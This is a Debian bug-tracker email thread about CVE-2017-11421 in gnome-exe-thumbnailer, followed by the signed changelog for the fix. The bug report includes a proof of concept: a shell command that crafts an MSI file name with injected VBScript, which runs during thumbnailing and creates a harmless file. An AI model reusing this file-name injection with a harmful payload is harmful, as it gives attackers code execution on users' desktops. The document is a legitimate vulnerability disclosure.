Your message dated Sat, 12 Aug 2017 16:17:09 +0000 with message-id <e1dgz65-0008id...@fasolo.debian.org> and subject line Bug#868705: fixed in gnome-exe-thumbnailer 0.9.4-2+deb9u1 has caused the Debian Bug report #868705, regarding gnome-exe-thumbnailer: CVE-2017-11421: Thumbnail generation for MSI files executes arbitrary VBScript to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 868705: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=868705 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Package: gnome-exe-thumbnailer Version: 0.9.4-2 Severity: grave Tags: security Justification: user security hole Dear Maintainer, the following PoC is copied verbatim from my post about the parsing issue: http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html Proof of Concept Install Dependencies On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus and wixl. The wixl package is only needed to create MSI files that trigger the thumbnailer. If the proof of concept does not work, install winetricks and run winetricks wsh56 to upgrade the Windows Script Host. Create MSI Files Create a file named poc.xml with the following content: <?xml version="1.0" encoding="utf-8"?> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi";> <Product Version="1.0"/> </Wix> Execute the following Bourne Shell code: wixl -o poc.msi poc.xml cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi" Trigger Execution Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear. *** End of the template - remove these template lines *** -- System Information: Debian Release: 9.0 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: sysvinit (via /sbin/init) Versions of packages gnome-exe-thumbnailer depends on: ii icoutils 0.31.2-1.1 ii imagemagick 8:6.9.7.4+dfsg-11 ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11 ii libglib2.0-bin 2.50.3-2 Versions of packages gnome-exe-thumbnailer recommends: pn wine <none> pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev <none> gnome-exe-thumbnailer suggests no packages. -- no debconf information
--- End Message ---
--- Begin Message ---Source: gnome-exe-thumbnailer Source-Version: 0.9.4-2+deb9u1 We believe that the bug you reported is fixed in the latest version of gnome-exe-thumbnailer, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 868...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. James Lu <bitfl...@gmail.com> (supplier of updated gnome-exe-thumbnailer package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Format: 1.8 Date: Tue, 25 Jul 2017 07:28:41 -0700 Source: gnome-exe-thumbnailer Binary: gnome-exe-thumbnailer Architecture: source Version: 0.9.4-2+deb9u1 Distribution: stretch Urgency: high Maintainer: Debian Wine Party <pkg-wine-party@lists.alioth.debian.org> Changed-By: James Lu <bitfl...@gmail.com> Description: gnome-exe-thumbnailer - Wine .exe and other executable thumbnailer for GNOME Closes: 868705 Changes: gnome-exe-thumbnailer (0.9.4-2+deb9u1) stretch; urgency=high . * Add patch switch-to-msiinfo.patch: - Switch to msitools' msiinfo for ProductVersion fetching, replacing the insecure VBScript-based parsing as described at http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html (Closes: #868705; LP: #651610; CVE-2017-11421) * Add msitools to recommends; it is now used to fetch .msi version info. * Add patch fix-version-label-readability.patch backported from https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1cf4df81836985d9660f950287232b3255ee17bb to fix unreadable white-on-white text on version labels. Checksums-Sha1: 5e7a07883b56197e25bdd3a23e2b66740ff2d508 2099 gnome-exe-thumbnailer_0.9.4-2+deb9u1.dsc ce5e525d1a614d999c02f220c99d3ee68e9a5111 6096 gnome-exe-thumbnailer_0.9.4-2+deb9u1.debian.tar.xz 57deb3a84ec4ce9486ec8bc24190d412e309c089 6008 gnome-exe-thumbnailer_0.9.4-2+deb9u1_source.buildinfo Checksums-Sha256: 5999ec0cb78928404927cbe660ee26a6a9cb3b3d0d2b7d89bf2b48bd22385dc7 2099 gnome-exe-thumbnailer_0.9.4-2+deb9u1.dsc c40e8c596aefd2ef1ffdf6eb08d938fae12b2edc46455cf46fba520bf237e9a6 6096 gnome-exe-thumbnailer_0.9.4-2+deb9u1.debian.tar.xz 297872ee4722ad8e3cecfa21d9e54ed7fc43183854228e6634491792e0b40db1 6008 gnome-exe-thumbnailer_0.9.4-2+deb9u1_source.buildinfo Files: 1ca70c81c6a39c13ccfcf8370b98baaf 2099 gnome optional gnome-exe-thumbnailer_0.9.4-2+deb9u1.dsc 8410682d3965ab6082aad5673c4a106f 6096 gnome optional gnome-exe-thumbnailer_0.9.4-2+deb9u1.debian.tar.xz 333aa3fd6bf8d5d4d24e9d564bc784c8 6008 gnome optional gnome-exe-thumbnailer_0.9.4-2+deb9u1_source.buildinfo -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEednFjFDWtapl1TDBdZd4qaNrSU8FAlmKC8UACgkQdZd4qaNr SU9Kaw/+K8kFXllY8w61T70NSAptBQg9Bn0cYrz4cR2PnLbs0kACuQB9mlJDKs5n oNobPBj4/uUFx4rpCXAwGOvAhn+rAZR6G7kg/F8aFZJi75dDFxMVGzAewE3gx0L4 TS317qbZpVpPdegQYlPY1UC+AOKefo8Ywh05qQvvqP2pjTzQ7QZQoY8oNa2SXLhR xK85dUrqcBPAUnFYsZC3Pn+a6dGvy60q1vfUT64L2vngvvXIIiX+1jX7LWUMjRQc tZ53uwsOguOfjvkfofQCn889+dSd+J9kIDtHVyXlXDxxkY6NV8iBstW+52TXOFeg baEBY019JQpVit9jPbWJvVy3Pj+Uqj+Me1wbD9W/m5IZ4RVJVuknsUdtpezoEZgf adwhS4sj+PV1rz1etpk/Z5FUl8D35rVQvYMrBLlzeS3442PgTvHaO0olyawYeFye dZEH9FPZp3eLTf+kjP2UEy1BggqaDAcBiK6Sxk5376WqsKZjn2LxcWZYcivkAbP9 zm8CS/IYW3ryDPslvCD6ugYOpVm16r8qqxFSAAOZ91hb4MIIm9TFG+VdehWEVK+R BTcmen4TdZ+nYqlU60A6ERcwG7Let1FwLhfSmv3VjRfH5Qff568R9eIZ/u5688aD t7HtQgglAtib7pwh1fK+gHKdsm/h4NLtP4J0NneMVq6vUJmPFt8= =1+jF -----END PGP SIGNATURE-----
--- End Message ---
_______________________________________________ pkg-wine-party mailing list pkg-wine-party@lists.alioth.debian.org http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-wine-party
